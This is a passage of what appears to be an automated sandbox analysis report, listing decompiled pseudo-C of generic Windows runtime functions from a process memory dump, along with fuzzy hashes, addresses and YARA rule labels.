Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
Instruction Fuzzy Hash: 92311471B41586BEE718EBB4C490BEEF764BF52208F08815EC41857351FB387A0AD7A4

Uniqueness

Uniqueness Score: -1.00%

Function 0462A70E, Relevance: .1, Instructions: 96
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E0462A70E(intOrPtr* __ecx, char* __edx) {
				unsigned int _v8;
				intOrPtr* _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t16;
				intOrPtr _t17;
				intOrPtr _t28;
				char* _t33;
				intOrPtr _t37;
				intOrPtr _t38;
				void* _t50;
				intOrPtr _t52;

				_push(__ecx);
				_push(__ecx);
				_t52 =  *0x46e7b10; // 0x8
				_t33 = __edx;
				_t48 = __ecx;
				_v12 = __ecx;
				if(_t52 == 0) {
					 *0x46e7b10 = 8;
					 *0x46e7b14 = 0x46e7b0c;
					 *0x46e7b18 = 1;
					L6:
					_t2 = _t52 + 1; // 0x9
					E0462A990(0x46e7b10, _t2, 7);
					asm("bts ecx, eax");
					 *_t48 = _t52;
					 *_t33 = 1;
					L3:
					_t16 = 0;
					L4:
					return _t16;
				}
				_t17 = L0462A840(__edx, __ecx, __ecx, _t52, 0x46e7b10, 1, 0);
				if(_t17 == 0xffffffff) {
					_t37 =  *0x46e7b10; // 0x8
					_t3 = _t37 + 0x27; // 0x2f
					__eflags = _t3 >> 5 -  *0x46e7b18; // 0x1
					if(__eflags > 0) {
						_t38 =  *0x46e7b9c; // 0x0
						_t4 = _t52 + 0x27; // 0x2f
						_v8 = _t4 >> 5;
						_t50 = L04614620(_t38 + 0xc0000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0xc0000, _t4 >> 5 << 2);
						__eflags = _t50;
						if(_t50 == 0) {
							_t16 = 0xc0000017;
							goto L4;
						}
						 *0x46e7b18 = _v8;
						_t8 = _t52 + 7; // 0xf
						E0463F3E0(_t50,  *0x46e7b14, _t8 >> 3);
						_t28 =  *0x46e7b14; // 0x773b7b0c
						__eflags = _t28 - 0x46e7b0c;
						if(_t28 != 0x46e7b0c) {
							L046177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
						}
						_t9 = _t52 + 8; // 0x10
						 *0x46e7b14 = _t50;
						_t48 = _v12;
						 *0x46e7b10 = _t9;
						goto L6;
					}
					 *0x46e7b10 = _t37 + 8;
					goto L6;
				}
				 *__ecx = _t17;
				 *_t33 = 0;
				goto L3;
			}

0x0462a713
0x0462a714
0x0462a717
0x0462a71d
0x0462a720
0x0462a722
0x0462a727
0x0462a74a
0x0462a754
0x0462a75e
0x0462a768
0x0462a76a
0x0462a773
0x0462a78b
0x0462a790
0x0462a792
0x0462a741
0x0462a741
0x0462a743
0x0462a749
0x0462a749
0x0462a732
0x0462a73a
0x0462a797
0x0462a79d
0x0462a7a3
0x0462a7a9
0x0462a7b6
0x0462a7bc
0x0462a7ca
0x0462a7e0
0x0462a7e2
0x0462a7e4
0x04669bf2
0x00000000
0x04669bf2
0x0462a7ed
0x0462a7f2
0x0462a800
0x0462a805
0x0462a80d
0x0462a812
0x04669c08
0x04669c08
0x0462a818
0x0462a81b
0x0462a821
0x0462a824
0x00000000
0x0462a824
0x0462a7ae
0x00000000
0x0462a7ae
0x0462a73c
0x0462a73e
0x00000000

Memory Dump Source

Source File: 00000007.00000002.508499448.00000000045D0000.00000040.00000001.sdmp, Offset: 045D0000, based on PE: true

Associated: 00000007.00000002.509039610.00000000046EB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.509063992.00000000046EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca45763285ee46f5eaca8d3424bd4257996119e7d602df96cef206f26a6cc768
Instruction ID: a751d61f74b7888f9fedd1d932a31f5ce2aed6bd8197481ef6cea7918508a30c
Opcode Fuzzy Hash: ca45763285ee46f5eaca8d3424bd4257996119e7d602df96cef206f26a6cc768
Instruction Fuzzy Hash: C731CCB5A00611ABD711CF59E980F2A77F9EB94711F14499AE0058B340F7B8AD0ACB91

Uniqueness

Uniqueness Score: -1.00%

Function 046261A0, Relevance: .1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E046261A0(signed int* __ecx) {
				intOrPtr _v8;
				char _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				intOrPtr _t30;
				intOrPtr _t31;
				void* _t32;
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t49;
				signed int _t51;
				intOrPtr _t52;
				signed int _t54;
				void* _t59;
				signed int* _t61;
				intOrPtr* _t64;

				_t61 = __ecx;
				_v12 = 0;
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
				_v16 = __ecx;
				_v8 = 0;
				if(_t30 == 0) {
					L6:
					_t31 = 0;
					L7:
					return _t31;
				}
				_t32 = _t30 + 0x5d8;
				if(_t32 == 0) {
					goto L6;
				}
				_t59 = _t32 + 0x30;
				if( *((intOrPtr*)(_t32 + 0x30)) == 0) {
					goto L6;
				}
				if(__ecx != 0) {
					 *((intOrPtr*)(__ecx)) = 0;
					 *((intOrPtr*)(__ecx + 4)) = 0;
				}
				if( *((intOrPtr*)(_t32 + 0xc)) != 0) {
					_t51 =  *(_t32 + 0x10);
					_t33 = _t32 + 0x10;
					_v20 = _t33;
					_t54 =  *(_t33 + 4);
					if((_t51 | _t54) == 0) {
						_t37 = E04625E50(0x45d67cc, 0, 0,  &_v12);
						if(_t37 != 0) {
							goto L6;
						}
						_t52 = _v8;
						asm("lock cmpxchg8b [esi]");
						_t64 = _v16;
						_t49 = _t37;
						_v20 = 0;
						if(_t37 == 0) {
							if(_t64 != 0) {
								 *_t64 = _v12;
								 *((intOrPtr*)(_t64 + 4)) = _t52;
							}
							E046C9D2E(_t59, 0, _v12, _v8,  *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38) & 0x0000ffff,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x3c)));
							_t31 = 1;
							goto L7;
						}
						E045FF7C0(_t52, _v12, _t52, 0);
						if(_t64 != 0) {
							 *_t64 = _t49;
							 *((intOrPtr*)(_t64 + 4)) = _v20;
						}
						L12:
						_t31 = 1;
						goto L7;
					}
					if(_t61 != 0) {
						 *_t61 = _t51;
						_t61[1] = _t54;
					}
					goto L12;
				} else {
					goto L6;
				}
			}

0x046261b3
0x046261b5
0x046261bd
0x046261c3
0x046261c7
0x046261d2
0x046261ff
0x046261ff
0x04626201
0x04626207
0x04626207
0x046261d4
0x046261d9
0x00000000
0x00000000
0x046261df
0x046261e2
0x00000000
0x00000000
0x046261e6
0x046261e8
0x046261ee
0x046261ee
0x046261f9
0x0466762f
0x04667632
0x04667635
0x04667639
0x04667640
0x0466766e
0x04667675
0x00000000
0x00000000
0x04667681
0x04667689
0x0466768d
0x04667691
0x04667695
0x04667699
0x046676af
0x046676b5
0x046676b7
0x046676b7
0x046676d7
0x046676dc
0x00000000
0x046676dc
0x046676a2
0x046676a9
0x04667651
0x04667653
0x04667653
0x04667656
0x04667656
0x00000000
0x04667656
0x04667644
0x04667646
0x04667648
0x04667648
0x00000000
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000007.00000002.508499448.00000000045D0000.00000040.00000001.sdmp, Offset: 045D0000, based on PE: true

Associated: 00000007.00000002.509039610.00000000046EB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.509063992.00000000046EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d565d45cdc39a71d08322530acf99efa73ccfaa02387dcb0bca025506b666db
Instruction ID: ff87b3aea4422d3a797c43de4e1e517f17c1e0ff6323f701e1d282533ce66452
Opcode Fuzzy Hash: 9d565d45cdc39a71d08322530acf99efa73ccfaa02387dcb0bca025506b666db
Instruction Fuzzy Hash: 1D316771605B119FD320DF09C904B26B7E4FB98B04F05496EA899DB351F7B0F804CB91

Uniqueness

Uniqueness Score: -1.00%

Function 045FAA16, Relevance: .1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E045FAA16(signed short* __ecx) {
				signed int _v8;
				intOrPtr _v12;
				signed short _v16;
				intOrPtr _v20;
				signed short _v24;
				signed short _v28;
				void* _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t25;
				signed short _t38;
				signed short* _t42;
				signed int _t44;
				signed short* _t52;
				signed short _t53;
				signed int _t54;

				_v8 =  *0x46ed360 ^ _t54;
				_t42 = __ecx;
				_t44 =  *__ecx & 0x0000ffff;
				_t52 =  &(__ecx[2]);
				_t51 = _t44 + 2;
				if(_t44 + 2 > (__ecx[1] & 0x0000ffff)) {
					L4:
					_t25 =  *0x46e7b9c; // 0x0
					_t53 = L04614620(_t44,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t25 + 0x180000, _t51);
					__eflags = _t53;
					if(_t53 == 0) {
						L3:
						return E0463B640(_t28, _t42, _v8 ^ _t54, _t51, _t52, _t53);
					} else {
						E0463F3E0(_t53,  *_t52,  *_t42 & 0x0000ffff);
						 *((short*)(_t53 + (( *_t42 & 0x0000ffff) >> 1) * 2)) = 0;
						L2:
						_t51 = 4;
						if(L04606C59(_t53, _t51, _t58) != 0) {
							_t28 = E04625E50(0x45dc338, 0, 0,  &_v32);
							__eflags = _t28;
							if(_t28 == 0) {
								_t38 = ( *_t42 & 0x0000ffff) + 2;
								__eflags = _t38;
								_v24 = _t53;
								_v16 = _t38;
								_v20 = 0;
								_v12 = 0;
								E0462B230(_v32, _v28, 0x45dc2d8, 1,  &_v24);
								_t28 = E045FF7A0(_v32, _v28);
							}
							__eflags = _t53 -  *_t52;
							if(_t53 !=  *_t52) {
								_t28 = L046177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						goto L3;
					}
				}
				_t53 =  *_t52;
				_t44 = _t44 >> 1;
				_t58 =  *((intOrPtr*)(_t53 + _t44 * 2));
				if( *((intOrPtr*)(_t53 + _t44 * 2)) != 0) {
					goto L4;
				}
				goto L2;
			}

0x045faa25
0x045faa29
0x045faa2d
0x045faa30
0x045faa37
0x045faa3c
0x04654458
0x04654458
0x04654472
0x04654474
0x04654476
0x045faa64
0x045faa74
0x0465447c
0x04654483
0x04654492
0x045faa52
0x045faa54
0x045faa5e
0x046544a8
0x046544ad
0x046544af
0x046544b6
0x046544b6
0x046544b9
0x046544bc
0x046544cd
0x046544d3
0x046544d6
0x046544e1
0x046544e1
0x046544e6
0x046544e8
0x046544fb
0x046544fb
0x046544e8
0x00000000
0x045faa5e
0x04654476
0x045faa42
0x045faa46
0x045faa48
0x045faa4c
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000007.00000002.508499448.00000000045D0000.00000040.00000001.sdmp, Offset: 045D0000, based on PE: true

Associated: 00000007.00000002.509039610.00000000046EB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.509063992.00000000046EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ce9501e2dca1dcbcb4f7c6e23aaa3ecbcdc36b612c34a1bf1641195db27841c8
Instruction ID: 5b5e724b4b7906907056ac88b0230d85c36bab9f4c74bc112ea33fcdd48c009f
Opcode Fuzzy Hash: ce9501e2dca1dcbcb4f7c6e23aaa3ecbcdc36b612c34a1bf1641195db27841c8
Instruction Fuzzy Hash: 4531BF72A00619ABDB119F68CD81ABEB3B8FF44704F004469F905EB250FB34BD50DBA5

Uniqueness

Uniqueness Score: -1.00%

Function 04634A2C, Relevance: .1, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E04634A2C(signed int* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int* _v12;
				char _v13;
				signed int _v16;
				char _v21;
				signed int* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				signed int* _t32;
				signed int* _t41;
				signed int _t42;
				void* _t43;
				intOrPtr* _t51;
				void* _t52;
				signed int _t53;
				signed int _t58;
				void* _t59;
				signed int _t60;
				signed int _t62;

				_t49 = __edx;
				_t62 = (_t60 & 0xfffffff8) - 0xc;
				_t26 =  *0x46ed360 ^ _t62;
				_v8 =  *0x46ed360 ^ _t62;
				_t41 = __ecx;
				_t51 = __edx;
				_v12 = __ecx;
				if(_a4 == 0) {
					if(_a8 != 0) {
						goto L1;
					}
					_v13 = 1;
					E04612280(_t26, 0x46e8608);
					_t58 =  *_t41;
					if(_t58 == 0) {
						L11:
						E0460FFB0(_t41, _t51, 0x46e8608);
						L2:
						 *0x46eb1e0(_a4, _a8);
						_t42 =  *_t51();
						if(_t42 == 0) {
							_t29 = 0;
							L5:
							_pop(_t52);
							_pop(_t59);
							_pop(_t43);
							return E0463B640(_t29, _t43, _v16 ^ _t62, _t49, _t52, _t59);
						}
						 *((intOrPtr*)(_t42 + 0x34)) = 1;
						if(_v21 != 0) {
							_t53 = 0;
							E04612280(_t28, 0x46e8608);
							_t32 = _v24;
							if( *_t32 == _t58) {
								 *_t32 = _t42;
								 *((intOrPtr*)(_t42 + 0x34)) =  *((intOrPtr*)(_t42 + 0x34)) + 1;
								if(_t58 != 0) {
									 *(_t58 + 0x34) =  *(_t58 + 0x34) - 1;
									asm("sbb edi, edi");
									_t53 =  !( ~( *(_t58 + 0x34))) & _t58;
								}
							}
							E0460FFB0(_t42, _t53, 0x46e8608);
							if(_t53 != 0) {
								L046177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						_t29 = _t42;
						goto L5;
					}
					if( *((char*)(_t58 + 0x40)) != 0) {
						L10:
						 *(_t58 + 0x34) =  *(_t58 + 0x34) + 1;
						E0460FFB0(_t41, _t51, 0x46e8608);
						_t29 = _t58;
						goto L5;
					}
					_t49 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					if( *((intOrPtr*)(_t58 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
						goto L11;
					}
					goto L10;
				}
				L1:
				_v13 = 0;
				_t58 = 0;
				goto L2;
			}

0x04634a2c
0x04634a34
0x04634a3c
0x04634a3e
0x04634a48
0x04634a4b
0x04634a4d
0x04634a51
0x04634a9c
0x00000000
0x00000000
0x04634aa3
0x04634aa8
0x04634aad
0x04634ab1
0x04634ade
0x04634ae3
0x04634a5a
0x04634a62
0x04634a6a
0x04634a6e
0x0466f203
0x04634a84
0x04634a88
0x04634a89
0x04634a8a
0x04634a95
0x04634a95
0x04634a79
0x04634a80
0x04634af2
0x04634af4
0x04634af9
0x04634aff
0x04634b01
0x04634b03
0x04634b08
0x0466f20a
0x0466f212
0x0466f216
0x0466f216
0x04634b08
0x04634b13
0x04634b1a
0x0466f229
0x0466f229
0x04634b1a
0x04634a82
0x00000000
0x04634a82
0x04634ab7
0x04634acd
0x04634acd
0x04634ad5
0x04634ada
0x00000000
0x04634ada
0x04634ac2
0x04634acb
0x00000000
0x00000000
0x00000000
0x04634acb
0x04634a53
0x04634a53
0x04634a58
0x00000000

Memory Dump Source

Source File: 00000007.00000002.508499448.00000000045D0000.00000040.00000001.sdmp, Offset: 045D0000, based on PE: true

Associated: 00000007.00000002.509039610.00000000046EB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.509063992.00000000046EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 31200e97d0c96a0b5836f1cae83e82b3c3b65a928694ce29d102c2ec06c788b9
Instruction ID: 5109d2fea53a2a53565a949aa23b9639e73531bfc7a1d60bb400af876231781c
Opcode Fuzzy Hash: 31200e97d0c96a0b5836f1cae83e82b3c3b65a928694ce29d102c2ec06c788b9
Instruction Fuzzy Hash: 1031CD32306690DBD721AF55C984B2AFBE4FF81B16F044969E8565B254FBB0F801CB89

Uniqueness

Uniqueness Score: -1.00%

Function 04638EC7, Relevance: .1, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E04638EC7(void* __ecx, void* __edx) {
				signed int _v8;
				signed int* _v16;
				intOrPtr _v20;
				signed int* _v24;
				char* _v28;
				signed int* _v32;
				intOrPtr _v36;
				signed int* _v40;
				signed int* _v44;
				signed int* _v48;
				intOrPtr _v52;
				signed int* _v56;
				signed int* _v60;
				signed int* _v64;
				intOrPtr _v68;
				signed int* _v72;
				char* _v76;
				signed int* _v80;
				signed int _v84;
				signed int* _v88;
				intOrPtr _v92;
				signed int* _v96;
				intOrPtr _v100;
				signed int* _v104;
				signed int* _v108;
				char _v140;
				signed int _v144;
				signed int _v148;
				signed int* _v152;
				char _v156;
				signed int* _v160;
				char _v164;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t67;
				intOrPtr _t70;
				void* _t71;
				void* _t72;
				signed int _t73;

				_t69 = __edx;
				_v8 =  *0x46ed360 ^ _t73;
				_t48 =  *[fs:0x30];
				_t72 = __edx;
				_t71 = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 0x18)) != 0) {
					_t48 = E04624E70(0x46e86e4, 0x4639490, 0, 0);
					if( *0x46e53e8 > 5 && E04638F33(0x46e53e8, 0, 0x2000) != 0) {
						_v156 =  *((intOrPtr*)(_t71 + 0x44));
						_v144 =  *(_t72 + 0x44) & 0x0000ffff;
						_v148 =  *(_t72 + 0x46) & 0x0000ffff;
						_v164 =  *((intOrPtr*)(_t72 + 0x58));
						_v108 =  &_v84;
						_v92 =  *((intOrPtr*)(_t71 + 0x28));
						_v84 =  *(_t71 + 0x24) & 0x0000ffff;
						_v76 =  &_v156;
						_t70 = 8;
						_v60 =  &_v144;
						_t67 = 4;
						_v44 =  &_v148;
						_v152 = 0;
						_v160 = 0;
						_v104 = 0;
						_v100 = 2;
						_v96 = 0;
						_v88 = 0;
						_v80 = 0;
						_v72 = 0;
						_v68 = _t70;
						_v64 = 0;
						_v56 = 0;
						_v52 = 0x46e53e8;
						_v48 = 0;
						_v40 = 0;
						_v36 = 0x46e53e8;
						_v32 = 0;
						_v28 =  &_v164;
						_v24 = 0;
						_v20 = _t70;
						_v16 = 0;
						_t69 = 0x45dbc46;
						_t48 = E04677B9C(0x46e53e8, 0x45dbc46, _t67, 0x46e53e8, _t70,  &_v140);
					}
				}
				return E0463B640(_t48, 0, _v8 ^ _t73, _t69, _t71, _t72);
			}

0x04638ec7
0x04638ed9
0x04638edc
0x04638ee6
0x04638ee9
0x04638eee
0x04638efc
0x04638f08
0x04671349
0x04671353
0x0467135d
0x04671366
0x0467136f
0x04671375
0x0467137c
0x04671385
0x04671390
0x04671391
0x0467139c
0x0467139d
0x046713a6
0x046713ac
0x046713b2
0x046713b5
0x046713bc
0x046713bf
0x046713c2
0x046713c5
0x046713c8
0x046713cb
0x046713ce
0x046713d1
0x046713d4
0x046713d7
0x046713da
0x046713dd
0x046713e0
0x046713e3
0x046713e6
0x046713e9
0x046713f6
0x04671400
0x04671400
0x04638f08
0x04638f32

Memory Dump Source

Source File: 00000007.00000002.508499448.00000000045D0000.00000040.00000001.sdmp, Offset: 045D0000, based on PE: true

Associated: 00000007.00000002.509039610.00000000046EB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.509063992.00000000046EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 599f1c03e64c9d258d28826eba56e0689b98f4e72a8d26b401f3a0a3f9b9ed33
Instruction ID: 6c8792a0add394fb86bc171d85d2590a7ee3dc0be933a4cc56e3f3cf51d872e4
Opcode Fuzzy Hash: 599f1c03e64c9d258d28826eba56e0689b98f4e72a8d26b401f3a0a3f9b9ed33
Instruction Fuzzy Hash: 954192B1D003589FDB20DFAAD980AADFBF4FB48714F5041AEE549A7600EB74AA44CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0462E730, Relevance: .1, Instructions: 89
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E0462E730(void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr* _a40) {
				intOrPtr* _v0;
				signed char _v4;
				signed int _v8;
				void* __ecx;
				void* __ebp;
				void* _t37;
				intOrPtr _t38;
				signed int _t44;
				signed char _t52;
				void* _t54;
				intOrPtr* _t56;
				void* _t58;
				char* _t59;
				signed int _t62;

				_t58 = __edx;
				_push(0);
				_push(4);
				_push( &_v8);
				_push(0x24);
				_push(0xffffffff);
				if(E04639670() < 0) {
					L0464DF30(_t54, _t58, _t35);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(_t54);
					_t52 = _v4;
					if(_t52 > 8) {
						_t37 = 0xc0000078;
					} else {
						_t38 =  *0x46e7b9c; // 0x0
						_t62 = _t52 & 0x000000ff;
						_t59 = L04614620(8 + _t62 * 4,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0x140000, 8 + _t62 * 4);
						if(_t59 == 0) {
							_t37 = 0xc0000017;
						} else {
							_t56 = _v0;
							 *(_t59 + 1) = _t52;
							 *_t59 = 1;
							 *((intOrPtr*)(_t59 + 2)) =  *_t56;
							 *((short*)(_t59 + 6)) =  *((intOrPtr*)(_t56 + 4));
							_t44 = _t62 - 1;
							if(_t44 <= 7) {
								switch( *((intOrPtr*)(_t44 * 4 +  &M0462E810))) {
									case 0:
										L6:
										 *((intOrPtr*)(_t59 + 8)) = _a8;
										goto L7;
									case 1:
										L13:
										 *((intOrPtr*)(__edx + 0xc)) = _a12;
										goto L6;
									case 2:
										L12:
										 *((intOrPtr*)(__edx + 0x10)) = _a16;
										goto L13;
									case 3:
										L11:
										 *((intOrPtr*)(__edx + 0x14)) = _a20;
										goto L12;
									case 4:
										L10:
										 *((intOrPtr*)(__edx + 0x18)) = _a24;
										goto L11;
									case 5:
										L9:
										 *((intOrPtr*)(__edx + 0x1c)) = _a28;
										goto L10;
									case 6:
										L17:
										 *((intOrPtr*)(__edx + 0x20)) = _a32;
										goto L9;
									case 7:
										 *((intOrPtr*)(__edx + 0x24)) = _a36;
										goto L17;
								}
							}
							L7:
							 *_a40 = _t59;
							_t37 = 0;
						}
					}
					return _t37;
				} else {
					_push(0x20);
					asm("ror eax, cl");
					return _a4 ^ _v8;
				}
			}

0x0462e730
0x0462e736
0x0462e738
0x0462e73d
0x0462e73e
0x0462e740
0x0462e749
0x0462e765
0x0462e76a
0x0462e76b
0x0462e76c
0x0462e76d
0x0462e76e
0x0462e76f
0x0462e775
0x0462e777
0x0462e77e
0x0466b675
0x0462e784
0x0462e784
0x0462e789
0x0462e7a8
0x0462e7ac
0x0462e807
0x0462e7ae
0x0462e7ae
0x0462e7b1
0x0462e7b4
0x0462e7b9
0x0462e7c0
0x0462e7c4
0x0462e7ca
0x0462e7cc
0x00000000
0x0462e7d3
0x0462e7d6
0x00000000
0x00000000
0x0462e7ff
0x0462e802
0x00000000
0x00000000
0x0462e7f9
0x0462e7fc
0x00000000
0x00000000
0x0462e7f3
0x0462e7f6
0x00000000
0x00000000
0x0462e7ed
0x0462e7f0
0x00000000
0x00000000
0x0462e7e7
0x0462e7ea
0x00000000
0x00000000
0x0466b685
0x0466b688
0x00000000
0x00000000
0x0466b682
0x00000000
0x00000000
0x0462e7cc
0x0462e7d9
0x0462e7dc
0x0462e7de
0x0462e7de
0x0462e7ac
0x0462e7e4
0x0462e74b
0x0462e751
0x0462e759
0x0462e761
0x0462e761

Memory Dump Source

Source File: 00000007.00000002.508499448.00000000045D0000.00000040.00000001.sdmp, Offset: 045D0000, based on PE: true

Associated: 00000007.00000002.509039610.00000000046EB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.509063992.00000000046EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe5b751a84cd05301ba0601f296c03e2e871f12bf0c03fa29705734a63020afc
Instruction ID: 288c7dff0b88162b401290ef032ff14d317f8b143a038d99efefa97968bffa4e
Opcode Fuzzy Hash: fe5b751a84cd05301ba0601f296c03e2e871f12bf0c03fa29705734a63020afc
Instruction Fuzzy Hash: B1318C75A14249EFE744CF68C940B9AB7E4FB19314F14826AF904CB341E636EC80CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0462BC2C, Relevance: .1, Instructions: 88
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E0462BC2C(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				intOrPtr _t22;
				intOrPtr* _t41;
				intOrPtr _t51;

				_t51 =  *0x46e6100; // 0x37
				_v12 = __edx;
				_v8 = __ecx;
				if(_t51 >= 0x800) {
					L12:
					return 0;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t22 = _t51;
					asm("lock cmpxchg [ecx], edx");
					if(_t51 == _t22) {
						break;
					}
					_t51 = _t22;
					if(_t22 < 0x800) {
						continue;
					}
					goto L12;
				}
				E04612280(0xd, 0x1627f1a0);
				_t41 =  *0x46e60f8; // 0x0
				if(_t41 != 0) {
					 *0x46e60f8 =  *_t41;
					 *0x46e60fc =  *0x46e60fc + 0xffff;
				}
				E0460FFB0(_t41, 0x800, 0x1627f1a0);
				if(_t41 != 0) {
					L6:
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *((intOrPtr*)(_t41 + 0x1c)) = _v12;
					 *((intOrPtr*)(_t41 + 0x20)) = _a4;
					 *(_t41 + 0x36) =  *(_t41 + 0x36) & 0x00008000 | _a8 & 0x00003fff;
					do {
						asm("lock xadd [0x46e60f0], ax");
						 *((short*)(_t41 + 0x34)) = 1;
					} while (1 == 0);
					goto L8;
				} else {
					_t41 = L04614620(0x46e6100,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xd0);
					if(_t41 == 0) {
						L11:
						asm("lock dec dword [0x46e6100]");
						L8:
						return _t41;
					}
					 *(_t41 + 0x24) =  *(_t41 + 0x24) & 0x00000000;
					 *(_t41 + 0x28) =  *(_t41 + 0x28) & 0x00000000;
					if(_t41 == 0) {
						goto L11;
					}
					goto L6;
				}
			}

0x0462bc36
0x0462bc42
0x0462bc45
0x0462bc4a
0x0462bd35
0x00000000
0x00000000
0x00000000
0x00000000
0x0462bc50
0x0462bc50
0x0462bc58
0x0462bc5a
0x0462bc60
0x00000000
0x00000000
0x0466a4f2
0x0466a4f6
0x00000000
0x00000000
0x00000000
0x0466a4fc
0x0462bc79
0x0462bc7e
0x0462bc86
0x0462bd16
0x0462bd20
0x0462bd20
0x0462bc8d
0x0462bc94
0x0462bcbd
0x0462bcca
0x0462bccb
0x0462bccc
0x0462bccd
0x0462bcce
0x0462bcd4
0x0462bcea
0x0462bcee
0x0462bcf2
0x0462bd00
0x0462bd04
0x00000000
0x0462bc96
0x0462bcab
0x0462bcaf
0x0462bd2c
0x0462bd2c
0x0462bd09
0x00000000
0x0462bd09
0x0462bcb1
0x0462bcb5
0x0462bcbb
0x00000000
0x00000000
0x00000000
0x0462bcbb

Memory Dump Source

Source File: 00000007.00000002.508499448.00000000045D0000.00000040.00000001.sdmp, Offset: 045D0000, based on PE: true

Associated: 00000007.00000002.509039610.00000000046EB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.509063992.00000000046EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 528755fbf81587ae2409bbed109ffe97e38e321f178af6bd434b9b3330677c7d
Instruction ID: 5aa88005bed78d48076dad13ab014e974098d642a35b528d08df16e177ffaedc
Opcode Fuzzy Hash: 528755fbf81587ae2409bbed109ffe97e38e321f178af6bd434b9b3330677c7d
Instruction Fuzzy Hash: 9031FD72A00A25ABDB11DF59C5807E673A4EB28714F54087AED04EF202FA78FD068F84

Uniqueness

Uniqueness Score: -1.00%

Function 045F9100, Relevance: .1, Instructions: 87
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E045F9100(signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
				signed int _t53;
				signed int _t56;
				signed int* _t60;
				signed int _t63;
				signed int _t66;
				signed int _t69;
				void* _t70;
				intOrPtr* _t72;
				void* _t78;
				void* _t79;
				signed int _t80;
				intOrPtr _t82;
				void* _t85;
				void* _t88;
				void* _t89;

				_t84 = __esi;
				_t70 = __ecx;
				_t68 = __ebx;
				_push(0x2c);
				_push(0x46cf6e8);
				E0464D0E8(__ebx, __edi, __esi);
				 *((char*)(_t85 - 0x1d)) = 0;
				_t82 =  *((intOrPtr*)(_t85 + 8));
				if(_t82 == 0) {
					L4:
					if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
						E046C88F5(_t68, _t70, _t78, _t82, _t84, __eflags);
					}
					L5:
					return E0464D130(_t68, _t82, _t84);
				}
				_t88 = _t82 -  *0x46e86c0; // 0x9307b0
				if(_t88 == 0) {
					goto L4;
				}
				_t89 = _t82 -  *0x46e86b8; // 0x0
				if(_t89 == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L4;
				} else {
					E04612280(_t82 + 0xe0, _t82 + 0xe0);
					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
					__eflags =  *((char*)(_t82 + 0xe5));
					if(__eflags != 0) {
						E046C88F5(__ebx, _t70, _t78, _t82, __esi, __eflags);
						goto L12;
					} else {
						__eflags =  *((char*)(_t82 + 0xe4));
						if( *((char*)(_t82 + 0xe4)) == 0) {
							 *((char*)(_t82 + 0xe4)) = 1;
